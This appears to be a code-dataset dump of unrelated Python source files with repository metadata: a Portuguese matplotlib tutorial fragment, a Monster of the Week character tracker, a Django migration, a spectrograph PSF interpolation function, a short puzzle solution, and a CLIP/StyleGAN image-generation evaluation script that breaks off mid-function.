plt.title(f'subplot(2,3,{p})');
else:
plt.title(f'subplot(2,3,{p})');
p-=3 #
plt.plot(x,np.cos(p*x),c=[p/9,p/7,p/8],label=f'$cos({p}x)$')
plt.legend(loc=0,fontsize=8)
plt.xlabel('x'); plt.ylabel('y');
# plotagem
for p in range(1,7):
sencosx(p)
**Exemplo 3:** gráficos de um ponto isolado em matriz 4 x 3.
plt.figure(figsize=(15,4))
m,n = 4,3
def star(p):
plt.subplot(m,n,p)
plt.axis('off') # desliga eixos
plt.plot(0.5,0.5,marker='*',c=list(np.random.rand(3)),ms=p*2)
plt.annotate(f'subplot({m},{n},{p})',(0.5,0.5),c='g',fontsize=10)
for p in range(1,m*n+1):
star(p);
## Plots com gradeado
Podemos habilitar o gradeado usando `grid(b,which,axis)`.
Para especificar o gradeado:
- em ambos os eixos, use `b='True'` ou `b='False'`.
- maior, menor ou ambos, use `which='major'`, `which='minor'` ou `which='both'`.
- nos eixos x, y ou ambos, use `axis='x'`, `axis='y'` ou `axis='both'`.
x = np.linspace(-10,10)
plt.plot(x,x)
plt.grid(True)
plt.plot(x,x)
plt.grid(True,which='major',axis='x')
plt.plot(x,x)
plt.grid(True,which='major',axis='y')
**Exemplo:** plotagem de gradeado.
Neste exemplo, um eixo abstrato é adicionado sobre a figura (criada diretamente) origem no ponto (0.025,0.025), largura 0.95 e altura 0.95.
ax = plt.axes([0.025, 0.025, 0.95, 0.95])
ax.set_xlim(0,4)
ax.set_ylim(0,3)
# MultipleLocator estabelece pontos de referência para divisão da grade
ax.xaxis.set_major_locator(plt.MultipleLocator(1.0)) # divisor maior em X
ax.xaxis.set_minor_locator(plt.MultipleLocator(0.2)) # divisor maior em X
ax.yaxis.set_major_locator(plt.MultipleLocator(1.0)) # divisor maior em Y
ax.yaxis.set_minor_locator(plt.MultipleLocator(0.1)) # divisor maior em Y
# propriedades das linhas
ax.grid(which='major', axis='x', linewidth=0.75, linestyle='-', color='r')
ax.grid(which='minor', axis='x', linewidth=0.5, linestyle=':', color='b')
ax.grid(which='major', axis='y', linewidth=0.75, linestyle='-', color='r')
ax.grid(which='minor', axis='y', linewidth=0.5, linestyle=':', color='g')
# para remover as ticks, adicione comentários
#ax.set_xticklabels([])
#ax.set_yticklabels([]);
plt.plot(x,x,'k')
plt.plot(x,-x+4,'k')
## Plots com preenchimento
Podemos usar `fill_between` para criar preenchimentos de área em gráficos.
x = np.linspace(-np.pi, np.pi, 60)
y = np.sin(2*x)*np.cos(x/2)
plt.fill_between(x,y,alpha=0.5);
x = np.linspace(-np.pi, np.pi, 60)
f1 = np.sin(2*x)
f2 = 0.5*np.sin(2*x)
plt.plot(x,f1,c='r');
plt.plot(x,f2,c='k');
plt.fill_between(x,f1,f2,color='g',alpha=0.2); | 186 | 0 | 22 |
dbe37567374d909bfebaafcf8a547d45b740d7e5 | 10,249 | py | Python | character_tracker/character.py | mwalla/motw | b6e4eaaba46a4f7908db661c20498188f75a558c | [
"MIT"
] | null | null | null | character_tracker/character.py | mwalla/motw | b6e4eaaba46a4f7908db661c20498188f75a558c | [
"MIT"
] | null | null | null | character_tracker/character.py | mwalla/motw | b6e4eaaba46a4f7908db661c20498188f75a558c | [
"MIT"
] | null | null | null | from pprint import pprint as pp
from character_tracker.basic_moves import basic_moves
from character_tracker.roller import Roller
from character_tracker.utils import get_int_input, get_str_input
class Character(object):
"""A Monster of the Week game character.
"""
@property
@charm.setter
@property
@cool.setter
@property
@tough.setter
@property
@weird.setter
@property
@sharp.setter
if __name__ == "__main__":
pass
| 32.128527 | 99 | 0.54737 | from pprint import pprint as pp
from character_tracker.basic_moves import basic_moves
from character_tracker.roller import Roller
from character_tracker.utils import get_int_input, get_str_input
class Character(object):
"""A Monster of the Week game character.
"""
def __init__(self):
self.name = None
self.type = None
self._charm = 0
self._cool = 0
self._sharp = 0
self._tough = 0
self._weird = 0
self.luck = 7
self.harm = 0
self.unstable_injury = False
self.experience = 0
self.info = None
self.moves = []
self.haven = []
self.gear = []
self.improvements = []
self.advanced_improvements = []
self.history = ""
self.skills = ["charm", "cool", "sharp", "tough", "weird"]
self.roller = Roller
@property
def charm(self):
return self._charm
@charm.setter
def charm(self, value):
if self._charm is None and self.charm is None:
self._charm = 0
elif self._charm is None and self.charm is not None:
self._charm = self.charm
if self._charm + value > 3:
print(f"You cannot have a Charm value over 3.\n")
self._charm = None
elif self._charm + value < -1:
print(f"You cannot have a Charm value under -1.\n")
self._charm = None
else:
self._charm = value
@property
def cool(self):
return self._cool
@cool.setter
def cool(self, value):
if self._cool is None and self.cool is None:
self._cool = 0
elif self._cool is None and self.cool is not None:
self._cool = self.cool
if self._cool + value > 3:
print(f"You cannot have a Cool value over 3.\n")
self._cool = None
elif self._cool + value < -1:
print(f"You cannot have a Cool value under -1.\n")
self._cool = None
else:
self._cool = value
@property
def tough(self):
return self._tough
@tough.setter
def tough(self, value):
if self._tough is None and self.tough is None:
self._tough = 0
elif self._tough is None and self.tough is not None:
self._tough = self.tough
if self._tough + value > 3:
print(f"You cannot have a Tough value over 3.\n")
self._tough = None
elif self._tough + value < -1:
print(f"You cannot have a Tough value under -1.\n")
self._tough = None
else:
self._tough = value
@property
def weird(self):
return self._weird
@weird.setter
def weird(self, value):
if self._weird is None and self.weird is None:
self._weird = 0
elif self._weird is None and self.weird is not None:
self._weird = self.weird
if self._weird + value > 3:
print(f"You cannot have a Weird value over 3.\n")
self._weird = None
elif self._weird + value < -1:
print(f"You cannot have a Weird value under -1.\n")
self._weird = None
else:
self._weird = value
@property
def sharp(self):
return self._sharp
@sharp.setter
def sharp(self, value):
if self._sharp is None and self.sharp is None:
self._sharp = 0
elif self._sharp is None and self.sharp is not None:
self._sharp = self.sharp
if self._sharp + value > 3:
print(f"You cannot have a Sharp value over 3.\n")
self._sharp = None
elif self._sharp + value < -1:
print(f"You cannot have a Sharp value under -1.\n")
self._sharp = None
else:
self._sharp = value
def get_move_info(self, score: [int, None], move: str):
if self.unstable_injury:
self.harm += 1
print(
f"Damn this unstable wound! My harm is now {self.harm}!\nAnd it's getting worse!\n"
)
if score is None:
return basic_moves[move]["msg"]
if score < 7:
self.experience += 1
if self.experience >= 5:
self.level_up()
self.experience = 0
return basic_moves[move]["miss_msg"]
elif 7 <= score < 10:
return basic_moves[move]["hit_msg"]
elif 10 <= score < 12:
return basic_moves[move]["big_hit_msg"]
elif 12 <= score:
return basic_moves[move]["adv_hit_msg"]
def show_helpful_stuff(self, move: str):
output = {}
move_keys = [int(key) for key in self.info["keys"]["moves"][move]]
for move_key in move_keys:
if move_key in self.moves:
title, _, description = self.info["moves"][str(move_key)].partition(":")
output[title] = description
if self.info["keys"]["haven"]:
haven_keys = [int(key) for key in self.info["keys"]["haven"][move]]
for haven_key in haven_keys:
if haven_key in self.haven:
title, _, description = self.info["haven"][str(haven_key)].partition(":")
output[title] = description
if not output:
output = (
"You don't have any Expert moves or Haven options to help with this."
)
return output
def make_a_move(self, move: str, skill: str, skill_level: int) -> (str, str, dict):
result, roller_output = self.roller(skill, skill_level).main()
msg_output = self.get_move_info(result, move)
help_output = self.show_helpful_stuff(move)
return roller_output, msg_output, help_output
def print_a_move(self, move, skill, skill_level):
roller, msg, help_ = self.make_a_move(
move=move, skill=skill, skill_level=skill_level
)
print()
print(roller)
print(msg)
pp(help_, width=120)
print()
def act_under_pressure(self):
move = "act_under_pressure"
skill = "cool"
self.print_a_move(move=move, skill=skill, skill_level=self.cool)
def help_out(self):
move = "help_out"
skill = "cool"
self.print_a_move(move=move, skill=skill, skill_level=self.cool)
def investigate_a_mystery(self):
move = "investigate"
skill = "sharp"
self.print_a_move(move=move, skill=skill, skill_level=self.sharp)
def read_a_situation(self):
move = "read_a_situation"
skill = "sharp"
self.print_a_move(move=move, skill=skill, skill_level=self.sharp)
def kick_some_ass(self):
move = "kick_some_ass"
skill = "tough"
self.print_a_move(move=move, skill=skill, skill_level=self.tough)
def protect(self):
move = "protect"
skill = "tough"
self.print_a_move(move=move, skill=skill, skill_level=self.tough)
def manipulate_someone(self):
move = "manipulate"
skill = "charm"
self.print_a_move(move=move, skill=skill, skill_level=self.charm)
def use_magic(self):
move = "magic"
skill = "weird"
self.print_a_move(move=move, skill=skill, skill_level=self.weird)
def big_magic(self):
print(self.get_move_info(None, "big_magic"))
return self.use_magic()
def spend_luck(self):
self.luck -= 1
print(f"\n{self.info['luck']['1']}")
if self.luck == 0:
print(f"\n{basic_moves['luck']['out_of_luck_msg']}")
return self.get_move_info(None, "luck")
def do_harm(self):
print(self.get_move_info(None, "harm"))
level = get_int_input("harm")
unstable = get_str_input(", is the wound unstable? y/n")
if "y" in unstable.lower():
self.unstable_injury = True
self.harm += level
def recovery(self):
print(self.get_move_info(None, "recovery"))
level = get_int_input("recovery")
if self.unstable_injury:
stable = get_str_input(", has the wound been stabilized? y/n")
if "y" in stable.lower():
self.unstable_injury = False
self.harm -= level
def character_setup(self):
self.set_skill_levels()
self.show_me_the_moves()
self.make_me_a_haven()
self.get_me_some_gear()
def show_me_the_moves(self):
# To be overwritten in child class
pass
def make_me_a_haven(self):
# To be overwritten in child class
pass
def get_me_some_gear(self):
# To be overwritten in child class
pass
def remind_me(self):
# To be overwritten in child class
pass
def improve_me(self):
# TODO: Implement this.
pass
def level_up(self):
# TODO: Implement this.
pass
def set_skill_levels(self):
for skill in self.skills:
if skill == "charm":
while True:
level = get_int_input(skill + " level?")
self.charm = level
if self._charm is not None:
break
elif skill == "cool":
while True:
level = get_int_input(skill + " level?")
self.cool = level
if self.cool is not None:
break
elif skill == "sharp":
while True:
level = get_int_input(skill + " level?")
self.sharp = level
if self.sharp is not None:
break
elif skill == "tough":
while True:
level = get_int_input(skill + " level?")
self.tough = level
if self.tough is not None:
break
elif skill == "weird":
while True:
level = get_int_input(skill + " level?")
self.weird = level
if self.weird is not None:
break
if __name__ == "__main__":
pass
| 8,831 | 0 | 935 |
6a08aded68a0728240f0327c01b6231d1050cb75 | 545 | py | Python | squalaetp/migrations/0013_auto_20191004_2034.py | Nels885/csd_dashboard | aa5a3b970c50a2a93af722f962bd87c3728f233c | [
"MIT"
] | null | null | null | squalaetp/migrations/0013_auto_20191004_2034.py | Nels885/csd_dashboard | aa5a3b970c50a2a93af722f962bd87c3728f233c | [
"MIT"
] | null | null | null | squalaetp/migrations/0013_auto_20191004_2034.py | Nels885/csd_dashboard | aa5a3b970c50a2a93af722f962bd87c3728f233c | [
"MIT"
] | null | null | null | # Generated by Django 2.2.5 on 2019-10-04 18:34
from django.db import migrations
| 24.772727 | 89 | 0.588991 | # Generated by Django 2.2.5 on 2019-10-04 18:34
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('squalaetp', '0012_auto_20190829_1605'),
]
operations = [
migrations.AlterModelOptions(
name='corvet',
options={'ordering': ['vin'], 'verbose_name': 'données CORVET'},
),
migrations.AlterModelOptions(
name='xelon',
options={'ordering': ['numero_de_dossier'], 'verbose_name': 'dossier Xelon'},
),
]
| 0 | 440 | 23 |
fef2daf4a0ac0128aa8faa54a5ca0dfef20ab933 | 5,078 | py | Python | 2d_PSF_code/PIPE2D-347/Provide_PSF_2D.py | Subaru-PFS/dev_pfsmodel | d01cf03a4c4eaa01ba5a9590ccf17744a33bdb05 | [
"MIT"
] | null | null | null | 2d_PSF_code/PIPE2D-347/Provide_PSF_2D.py | Subaru-PFS/dev_pfsmodel | d01cf03a4c4eaa01ba5a9590ccf17744a33bdb05 | [
"MIT"
] | null | null | null | 2d_PSF_code/PIPE2D-347/Provide_PSF_2D.py | Subaru-PFS/dev_pfsmodel | d01cf03a4c4eaa01ba5a9590ccf17744a33bdb05 | [
"MIT"
] | null | null | null |
import numpy as np
def provide_PSF_2D(x=None,y=None,PSF_version=None):
""" Provides 2D PSF at any position in the detector plane
This a version which takes a finite nubmer of pregenerated PSF and \
creates the interpolated version at required position
(Future: version which takes interpolated values for Zernike \
coefficients and generates image on the fly?)
To be used with the focused data taken on July 25 and 26
(e.g., 21400 for HgAr, 21604 for Ne, 21808 for Kr)
Example usage: ``provide_PSF_2D(10,2010)'' 10 is x-coordinate,
and 2010 is y-coordinate
@param[in] x x-coordinate
@param[in] y y-coordinate
@param[in] PSF_version version of the PSF input files
@returns numpy array, 100x100, oversampled 5 times,
corresponding to 20x20 physical pixels
(300x300 microns)
"""
# on tiger the directory contaning array of PSFs is at:
DATA_DIRECTORY='/tigress/ncaplar/PIPE2D-450/'
if PSF_version is None:
PSF_version='Sep12_v1'
positions_of_simulation=np.load(DATA_DIRECTORY+\
'positions_of_simulation_00_from_'+PSF_version+'.npy')
array_of_simulation=np.load(DATA_DIRECTORY+\
'array_of_simulation_00_from_'+PSF_version+'.npy')
# x and y position with simulated PSFs
x_positions_of_simulation=positions_of_simulation[:,1]
y_positions_of_simulation=positions_of_simulation[:,2]
# This is a simple code that finds the closest avaliable PSFs, given the x and y position
# This will have to be improved in order when we get to work with the full populated dectector plane
# how far in x-dimension are you willing to search for suitable simulated PSFs
x_search_distance=20
# positions of all simulated PSFs in that range
positions_of_simulation_in_acceptable_x_range=\
positions_of_simulation[(x_positions_of_simulation<(x+x_search_distance))\
&(x_positions_of_simulation>(x-x_search_distance))]
# if there are no simulated PSF avaliable in the specified x-range we are not able to provide the solution
if len(positions_of_simulation_in_acceptable_x_range)<2:
print('No simulated PSFs are avaliable in this x-area of the detector,')
print('probably because this fiber has not been illuminated;')
print('returning the closest avaliable PSFs, BUT that is probably not what you want')
distances=np.sqrt(((x-x_positions_of_simulation)**2+\
(y-y_positions_of_simulation)**2).astype(float))
index_of_closest_distance=np.where(distances[distances==\
np.min(distances)])[0][0]
return array_of_simulation[index_of_closest_distance]
# y-distance from the requested positions for all of the suitable simulated PSFs
distances_of_y_requested_position_from_avaliable=\
y-positions_of_simulation_in_acceptable_x_range[:,2]
# out of the suitable PSFs which 2 are the closest
index_of_1st_closest_simulated_psf=\
np.where(np.abs(distances_of_y_requested_position_from_avaliable)==\
np.sort(np.abs(distances_of_y_requested_position_from_avaliable))[0])[0][0]
index_of_2nd_closest_simulated_psf=\
np.where(np.abs(distances_of_y_requested_position_from_avaliable)==\
np.sort(np.abs(distances_of_y_requested_position_from_avaliable))[1])[0][0]
# where are these 2 closest PSF in the initial table
index_of_1st_closest_simulated_psf_in_positions_of_simulation=\
np.where(np.sum(positions_of_simulation,axis=1)==\
np.sum(positions_of_simulation_in_acceptable_x_range[index_of_1st_closest_simulated_psf]))[0][0]
index_of_2nd_closest_simulated_psf_in_positions_of_simulation=\
np.where(np.sum(positions_of_simulation,axis=1)==\
np.sum(positions_of_simulation_in_acceptable_x_range[index_of_2nd_closest_simulated_psf]))[0][0]
# extract the 2 simulated PSFs
first_array_simulation=\
array_of_simulation[index_of_1st_closest_simulated_psf_in_positions_of_simulation]
second_array_simulation=\
array_of_simulation[index_of_2nd_closest_simulated_psf_in_positions_of_simulation]
# distance of each PSF from the proposed position
y1_distance=\
y-positions_of_simulation[index_of_1st_closest_simulated_psf_in_positions_of_simulation][2]
y2_distance=\
y-positions_of_simulation[index_of_2nd_closest_simulated_psf_in_positions_of_simulation][2]
# if you requested psf at the exact position of existing PSF use that one
if y1_distance==0:
return first_array_simulation
else:
# create the predicted PSF as a linear interpolation of these two PSFs
predicted_psf=(second_array_simulation-first_array_simulation*(y2_distance/y1_distance))/(1-y2_distance/y1_distance)
return predicted_psf
| 52.350515 | 124 | 0.713864 |
import numpy as np
def provide_PSF_2D(x=None,y=None,PSF_version=None):
""" Provides 2D PSF at any position in the detector plane
This a version which takes a finite nubmer of pregenerated PSF and \
creates the interpolated version at required position
(Future: version which takes interpolated values for Zernike \
coefficients and generates image on the fly?)
To be used with the focused data taken on July 25 and 26
(e.g., 21400 for HgAr, 21604 for Ne, 21808 for Kr)
Example usage: ``provide_PSF_2D(10,2010)'' 10 is x-coordinate,
and 2010 is y-coordinate
@param[in] x x-coordinate
@param[in] y y-coordinate
@param[in] PSF_version version of the PSF input files
@returns numpy array, 100x100, oversampled 5 times,
corresponding to 20x20 physical pixels
(300x300 microns)
"""
# on tiger the directory contaning array of PSFs is at:
DATA_DIRECTORY='/tigress/ncaplar/PIPE2D-450/'
if PSF_version is None:
PSF_version='Sep12_v1'
positions_of_simulation=np.load(DATA_DIRECTORY+\
'positions_of_simulation_00_from_'+PSF_version+'.npy')
array_of_simulation=np.load(DATA_DIRECTORY+\
'array_of_simulation_00_from_'+PSF_version+'.npy')
# x and y position with simulated PSFs
x_positions_of_simulation=positions_of_simulation[:,1]
y_positions_of_simulation=positions_of_simulation[:,2]
# This is a simple code that finds the closest avaliable PSFs, given the x and y position
# This will have to be improved in order when we get to work with the full populated dectector plane
# how far in x-dimension are you willing to search for suitable simulated PSFs
x_search_distance=20
# positions of all simulated PSFs in that range
positions_of_simulation_in_acceptable_x_range=\
positions_of_simulation[(x_positions_of_simulation<(x+x_search_distance))\
&(x_positions_of_simulation>(x-x_search_distance))]
# if there are no simulated PSF avaliable in the specified x-range we are not able to provide the solution
if len(positions_of_simulation_in_acceptable_x_range)<2:
print('No simulated PSFs are avaliable in this x-area of the detector,')
print('probably because this fiber has not been illuminated;')
print('returning the closest avaliable PSFs, BUT that is probably not what you want')
distances=np.sqrt(((x-x_positions_of_simulation)**2+\
(y-y_positions_of_simulation)**2).astype(float))
index_of_closest_distance=np.where(distances[distances==\
np.min(distances)])[0][0]
return array_of_simulation[index_of_closest_distance]
# y-distance from the requested positions for all of the suitable simulated PSFs
distances_of_y_requested_position_from_avaliable=\
y-positions_of_simulation_in_acceptable_x_range[:,2]
# out of the suitable PSFs which 2 are the closest
index_of_1st_closest_simulated_psf=\
np.where(np.abs(distances_of_y_requested_position_from_avaliable)==\
np.sort(np.abs(distances_of_y_requested_position_from_avaliable))[0])[0][0]
index_of_2nd_closest_simulated_psf=\
np.where(np.abs(distances_of_y_requested_position_from_avaliable)==\
np.sort(np.abs(distances_of_y_requested_position_from_avaliable))[1])[0][0]
# where are these 2 closest PSF in the initial table
index_of_1st_closest_simulated_psf_in_positions_of_simulation=\
np.where(np.sum(positions_of_simulation,axis=1)==\
np.sum(positions_of_simulation_in_acceptable_x_range[index_of_1st_closest_simulated_psf]))[0][0]
index_of_2nd_closest_simulated_psf_in_positions_of_simulation=\
np.where(np.sum(positions_of_simulation,axis=1)==\
np.sum(positions_of_simulation_in_acceptable_x_range[index_of_2nd_closest_simulated_psf]))[0][0]
# extract the 2 simulated PSFs
first_array_simulation=\
array_of_simulation[index_of_1st_closest_simulated_psf_in_positions_of_simulation]
second_array_simulation=\
array_of_simulation[index_of_2nd_closest_simulated_psf_in_positions_of_simulation]
# distance of each PSF from the proposed position
y1_distance=\
y-positions_of_simulation[index_of_1st_closest_simulated_psf_in_positions_of_simulation][2]
y2_distance=\
y-positions_of_simulation[index_of_2nd_closest_simulated_psf_in_positions_of_simulation][2]
# if you requested psf at the exact position of existing PSF use that one
if y1_distance==0:
return first_array_simulation
else:
# create the predicted PSF as a linear interpolation of these two PSFs
predicted_psf=(second_array_simulation-first_array_simulation*(y2_distance/y1_distance))/(1-y2_distance/y1_distance)
return predicted_psf
| 0 | 0 | 0 |
13933321fe38bfd9e54faf2a5d94361825a6d9ce | 155 | py | Python | Python/PieceOfCake/src/Main.py | Wabri/AKattisProblem | 3780ce312c54b7c01e83e8c6cf6877b6aa24ffcf | [
"MIT"
] | 1 | 2019-03-06T09:24:37.000Z | 2019-03-06T09:24:37.000Z | Python/PieceOfCake/src/Main.py | Wabri/AKattisProblem | 3780ce312c54b7c01e83e8c6cf6877b6aa24ffcf | [
"MIT"
] | null | null | null | Python/PieceOfCake/src/Main.py | Wabri/AKattisProblem | 3780ce312c54b7c01e83e8c6cf6877b6aa24ffcf | [
"MIT"
] | 2 | 2021-05-05T12:01:05.000Z | 2021-09-10T18:35:09.000Z | import sys
for i in sys.stdin:
ab = i.split()
n = int(ab[0])
h = int(ab[1])
v = int(ab[2])
print(max(h, n - h) * max(v, n - v) * 4)
| 14.090909 | 44 | 0.451613 | import sys
for i in sys.stdin:
ab = i.split()
n = int(ab[0])
h = int(ab[1])
v = int(ab[2])
print(max(h, n - h) * max(v, n - v) * 4)
| 0 | 0 | 0 |
315ff162a06104a8e332e3d340242a7318f868a6 | 21,635 | py | Python | eval.py | StolasIn/Lafite | a85ad9eec6de6c90ccba63ad3c43e45b0fe5d371 | [
"MIT"
] | null | null | null | eval.py | StolasIn/Lafite | a85ad9eec6de6c90ccba63ad3c43e45b0fe5d371 | [
"MIT"
] | null | null | null | eval.py | StolasIn/Lafite | a85ad9eec6de6c90ccba63ad3c43e45b0fe5d371 | [
"MIT"
] | null | null | null | import torch
import numpy as np
import pickle
import os
from PIL import Image
from pathlib import Path
from tqdm import tqdm
import dnnlib, legacy
import clip
import torch.nn.functional as F
import torchvision.transforms as T
import scipy
import warnings
import torchvision.models
from pymoo.core.problem import Problem
from pymoo.algorithms.moo.nsga2 import NSGA2
from pymoo.factory import get_sampling, get_crossover, get_mutation , get_selection
from pymoo.factory import get_decomposition
from pymoo.util.termination.default import MultiObjectiveDefaultTermination
from pymoo.optimize import minimize
from pymoo.util.display import Display
import time
import sys
import argparse
import shutil
from pymoo.visualization.scatter import Scatter
from numpy.linalg import norm
import matplotlib.pyplot as plt
import json
from qqdm import qqdm, format_str
from attn_loss import attention_lib,losses
import re
# ignore errors
warnings.filterwarnings('ignore')
# gen_model is used to get proper clip model for image genetate
gen_model_name = 'ViT-B/16'
# dis_model is used to grading an image and an text simularity
dis_model_name = 'ViT-L/14@336px'
# for verbose to display processing step
# timing
# generating image
# loading pre-training model
# generating (tensor)image using text feature and noise
# transform tensor into image
# scoring with text and image labels
# pick image with highest score
# generate image score using [text,image,labels]
# get socre from noise
# generate image using noise
# for tournament selection
if __name__ == '__main__':
# parser for convenient using
parser = argparse.ArgumentParser()
# whether to run get fesiable solution or not
parser.add_argument('-r', '--run', action='store_true',default = False)
# setting text
parser.add_argument('-t', '--text',type = str,default = 'a dog lying on an orange couch in the living room.')
# setting image generation (for normal generating)
parser.add_argument('-n', '--num',type = int,default = 10)
# pick #image
parser.add_argument('-p', '--pick',type = int,default = 1)
# get fesiable solution setting
parser.add_argument('-s', '--set',type = str,default = '1 1 1')
# draw plot
parser.add_argument('-d', '--draw',action='store_true',default = False)
# save memory
parser.add_argument('-m', '--save_mem',action='store_true',default = False)
args = parser.parse_args()
# split setting sentence
set_list = args.set
set_list = set_list.split()
pop = int(set_list[0])
ofs = int(set_list[1])
gen = int(set_list[2])
t = Timer()
txt = args.text
if not os.path.exists('image_result/{}'.format(txt)):
os.mkdir('image_result/{}'.format(txt))
path = 'image_result/{}/noise.txt'.format(txt)
f = open(path, 'w')
print('generate text = {}'.format(txt))
# run get fesiable solution
if args.run==True :
print('find fes : pop = {} , ofs = {} , gen = {}'.format(pop,ofs,gen))
res = get_fes(txt = txt,pop = pop, ofs = ofs,gen = gen)
# np.set_printoptions(threshold=sys.maxsize)
# print(res.X,file = f)
# draw pareto front
if args.draw == True:
ploter(res.F)
# generating image from res.X (nds)
# gen_from_noises(txt = txt,noises = res.X)
# Multi-Criteria Decision Making
best_res_id = mcdm(res)
gen_from_noises(txt = txt,noises = np.array([res.X[best_res_id]]),name = 'best_pick')
# store memory
if args.save_mem == True:
make_memory(txt = txt,noise = res.X[best_res_id])
# gen_from_noises(txt = txt,noises = np.array([noise_memory(txt = txt,pop = 1,pick = True)]),name = '123')
else :
print('generate {} images'.format(args.num))
gen_scored(txt = txt,image_n = args.num)
t.print_time()
f.close() | 32.387725 | 121 | 0.611232 | import torch
import numpy as np
import pickle
import os
from PIL import Image
from pathlib import Path
from tqdm import tqdm
import dnnlib, legacy
import clip
import torch.nn.functional as F
import torchvision.transforms as T
import scipy
import warnings
import torchvision.models
from pymoo.core.problem import Problem
from pymoo.algorithms.moo.nsga2 import NSGA2
from pymoo.factory import get_sampling, get_crossover, get_mutation , get_selection
from pymoo.factory import get_decomposition
from pymoo.util.termination.default import MultiObjectiveDefaultTermination
from pymoo.optimize import minimize
from pymoo.util.display import Display
import time
import sys
import argparse
import shutil
from pymoo.visualization.scatter import Scatter
from numpy.linalg import norm
import matplotlib.pyplot as plt
import json
from qqdm import qqdm, format_str
from attn_loss import attention_lib,losses
import re
# ignore errors
warnings.filterwarnings('ignore')
# gen_model is used to get proper clip model for image genetate
gen_model_name = 'ViT-B/16'
# dis_model is used to grading an image and an text simularity
dis_model_name = 'ViT-L/14@336px'
# for verbose to display processing step
class MyDisplay(Display):
def _do(self, problem, evaluator, algorithm):
super()._do(problem, evaluator, algorithm)
# #nondeterministic solutions
self.output.append('n_nds', len(algorithm.opt))
# mean score of nds
self.output.append('mean_score', -int(np.mean(np.sum(algorithm.pop.get('F'),axis = 1))))
# max score of nds
self.output.append('max_score', -int(np.min(np.sum(algorithm.pop.get('F'),axis = 1))))
class MyProblem(Problem):
def __init__(self,txt):
self.txt = txt
super().__init__(n_var=512, # #variable
n_obj=3, # objective
# choose [-4,4] for simulate gassion distribution
xl=-4, # upper bound
xu=4 # lower bound
)
def _evaluate(self, x, out, *args, **kwargs):
# text_image
# image_real
# image_label
# text_label
# scoring the noise
text_image,image_real,_,text_label = get_score_from_noises(txt = self.txt,noises = torch.from_numpy(x))
# objective function
f1 = np.array(text_image)
f2 = np.array(image_real)
# f3 = np.array(image_label)
f4 = np.array(text_label)
# stacking the function
out['F'] = np.column_stack([f1, f2, f4]).astype(np.float)
# timing
class Timer:
def __init__(self):
self.start_time = time.time()
self.current_time = time.time()
def print_time(self):
print('precessing {:.0f} seconds'.format(time.time() - self.current_time))
current_time = time.time()
def set_time(self):
self.start_time = time.time()
self.current_time = time.time()
# generating image
class Generator:
def __init__(self, device, path):
self.name = 'generator'
self.model = self.load_model(device, path)
self.device = device
self.force_32 = False
# loading pre-training model
def load_model(self, device, path):
with dnnlib.util.open_url(path) as f:
network= legacy.load_network_pkl(f)
self.G_ema = network['G_ema'].to(device)
self.D = network['D'].to(device)
return self.G_ema
# generating (tensor)image using text feature and noise
def generate(self, z, c, fts, noise_mode='const', return_styles=True):
return self.model(z, c, fts=fts, noise_mode=noise_mode, return_styles=return_styles, force_fp32=self.force_32)
def generate_from_style(self, style, noise_mode='const'):
ws = torch.randn(1, self.model.num_ws, 512)
return self.model.synthesis(ws, fts=None, styles=style, noise_mode=noise_mode, force_fp32=self.force_32)
# transform tensor into image
def tensor_to_img(self, tensor):
img = torch.clamp((tensor + 1.) * 127.5, 0., 255.)
img_list = img.permute(0, 2, 3, 1)
img_list = [img for img in img_list]
return Image.fromarray(torch.cat(img_list, dim=-2).detach().cpu().numpy().astype(np.uint8))
def get_txt_fts(txt = '',model = None):
device = 'cuda:0'
tokenized_text = clip.tokenize([txt]).to(device)
txt_fts = model.encode_text(tokenized_text)
txt_fts = txt_fts/txt_fts.norm(dim=-1, keepdim=True)
return txt_fts
def get_img_fts(img = None,model = None,preprocess = None):
device = 'cuda:0'
img = preprocess(image).unsqueeze(0).to(device)
img_fts = model.encode_image(img)
img_fts /= img_fts.norm(dim=-1, keepdim=True)
return img_fts
def get_img(txt = '',noise = None,model = None):
device = 'cuda:0'
path = './checkpoints/COCO2014_CLIP_ViTB16_best_FID_8.12.pkl' # pre-trained model
generator = Generator(device=device, path=path)
txt_fts = get_txt_fts(txt,model = model)
c = torch.randn((1, 1)).to(device)
img, _ = generator.generate(z=noise, c=c, fts=txt_fts)
img = generator.tensor_to_img(img)
return img
def process_img_name(txt = ''):
return txt.replace(' ','_').replace(',','_').replace('/','_').replace('.','')
def cosine_similarity(fts1 = None,fts2 = None):
return np.dot(fts1,fts2)/(norm(fts1)*norm(fts2))
def gen_images(txt = ''):
with torch.no_grad():
device = 'cuda:0'
clip_model, _ = clip.load(gen_model_name, device=device,jit=False)
clip_model = clip_model.eval()
txt_fts = get_txt_fts(txt = txt,model = clip_model)
z = torch.randn((1, 512)).to(device)
img = get_img(txt = txt,noise = z,model = clip_model)
img.save('./image_result/{}.png'.format(process_img_name(txt)))
# scoring with text and image labels
def get_text_label_score(txt = '',label = None):
device = 'cuda:0'
ma = -2
clip_model, preprocess = clip.load(dis_model_name, device=device,jit=False)
label_features = get_txt_fts(txt = label,model = clip_model)
label_features = label_features.detach().cpu().numpy().flatten()
# calculate cos similarity between word embedding and label embedding
for word in txt.split():
word_features = get_txt_fts(txt = word,model = clip_model)
word_features = word_features.detach().cpu().numpy().flatten()
sim = cosine_similarity(label_features,word_features)
ma = max(ma,sim)
return ma*100
def get_text_image_score(txt = '',img = None):
device = 'cuda:0'
clip_model, preprocess = clip.load(dis_model_name, device=device, jit=False) # use jit = false
clip_model = clip_model.eval()
tokenized_text = clip.tokenize([txt]).to(device)
img = preprocess(img).unsqueeze(0).to(device)
text_score = clip_model(img,tokenized_text)
return text_score[0].item()
# pick image with highest score
def gen_scored(txt = '',image_n = 10):
with torch.no_grad():
device = 'cuda:0'
clip_model,_ = clip.load(gen_model_name, device=device,jit=False)
clip_model = clip_model.eval()
txt_fts = get_txt_fts(txt = txt,model = clip_model)
ma = -1
for i in tqdm(range(image_n)):
z = torch.randn((1, 512)).to(device)
img = get_img(txt = txt,noise = z,model = clip_model)
score = get_score(txt = txt,img = img)
if sum(score.values())>ma:
ma = sum(score.values())
best_img = img
best_img.save('./image_result/{}-{:.2f}.png'.format(process_img_name(txt),ma))
# generate image score using [text,image,labels]
def get_score(txt = '', img = None):
loss = region_word_loss(txt = txt,img = img)
print(loss)
# text_image_score (clip score)
device = 'cuda:0'
text_image_score = get_text_image_score(txt = txt,img = img)
# (vgg19_bn score)
model = torch.hub.load('pytorch/vision:v0.10.0', 'vgg19_bn', pretrained=True)
model.eval()
preprocess = T.Compose([
T.Resize(256),
